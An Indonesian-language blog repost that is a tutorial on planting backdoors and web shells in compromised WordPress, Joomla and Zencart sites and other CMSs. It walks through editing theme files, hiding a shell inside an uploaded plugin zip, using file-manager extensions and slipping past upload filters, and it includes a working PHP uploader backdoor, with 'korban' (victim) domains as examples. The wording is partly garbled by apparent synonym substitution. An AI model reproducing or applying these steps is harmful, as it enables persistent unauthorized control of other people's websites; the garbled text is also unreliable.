Cara Mencari Shell Yang Sudah Ditanam



Padalah inti puas posting kali ini adalah kita akan membincangkan
Bagaimana Cara Menanam Backdoor / Shell Di Bervariasi Macam CMS



WordPress :

1.
Theme-editor

Pergi ke appearance –> editor –> klik blabla.php –> ganti dengan script shell –> save –> pergi ke themes –> klik kanan sreg theme yang dipake –> Open Image Location –> ganti /screenshot.png dgn blablabla.php tadi

[ex :
www.sandy-x207.com/wp-content/themes/twentyten/single.php
]

2.
Upload plugin

Sisipkan shell plong folder plugin [ex : akismet] lalu masukan foldernya  ke zip

Pergi ke plugins –> add plugins –> upload

[akses shellnya di :
www.sandy-x207.com/wp-content/plugins/lumaho/guataulumaho.php
]

ket : lumaho itu merek folder, guataulumaho.php itu merek shell yang tadi sudah disisipkan

Joomla
 :

1.
Install extention
 :

Pergi ke extentions –> Install / Uninstall –> Upload –> jemah ada bacaan error, cuekin aja

[akses :
www.sandy-x207.com/tmp/shell.php
]

2.
Template manager
 :

Menjauhi ke extentions –> klik template manager –> memperbedakan –> edit html –>

ubah dengan script shell –> save

[akses : alamatnya teragendakan disitu]

3.
NinjaXplorer

 –
Download pluginsINI
 – Install dulu Extentions –> Install / Uninstall –> upload

 – Sekiranya sudah selesai, arahkan tab ke Components. Padalah udah ke install kan Plugins yg tadi kita Upload, Lebih lanjut masuk ke directory Plugins NinjaXplorer Tampilannya seperti ini :




– Sehabis diupload, shell rata-rata berada di
http://www.korban.com/news/backdoor.php
 atau
http://www.target.com/backdoor.php





Zencart
 :

– Login ke page admin

– masuk ke file dimana kita bisa menyunting filefile [

http://site/path/admin/define_pages_editor.php]

– memperbedakan plain text, dan pilih riuk satu file nan mau kita edit dan masukkan script uploader maupun shell kalian

<?php
echo

‘<b>Jundab<br><br>’.php_uname().'<br></b>’;
echo

‘<form action=”” method=”post” enctype=”multipart/form-data”


name=”uploader” id=”uploader”>’;
echo

‘<input type=”file” name=”file” size=”50″>


<input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’;
if( $_POST[‘_upl’] == “Upload”

) {
    if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’]))
{ echo

‘<b>Upload Success !!!</b><br><br>’; }
    else

{ echo

‘<b>Upload Fail !!!</b><br><br>’; }
}
?>



– timbrung ke file nan kalian pilih tadi melewati index.php
index.php?main_page=$file

– contoh jikalau kalian mengidas contact_us maka ikut ke file tersebut sebagai berikut :
index.php?main_page=contact_us

– Lain semua zencart bisa di edit filenya, karna sudah diberikan perm .

Kalaupun bisa diedit, belom tentu juga bisa upload file, karna dir berpunca path website tersebut di .htaccess atau diberikan permission 😉

Cms lain
 :

1. Cari fitur upload

[sungguhpun dilarang upload .php tapi dicoba aja lewat, banyak mengapa web yang bakir gitu :D]

2. Tamper Data

Sekian tutorial berpangkal saya

Source: https://worldcyberhacker.blogspot.com/2014/12/cara-menanam-backdoor-shell-di-berbagai.html

Posted by: holymayhem.com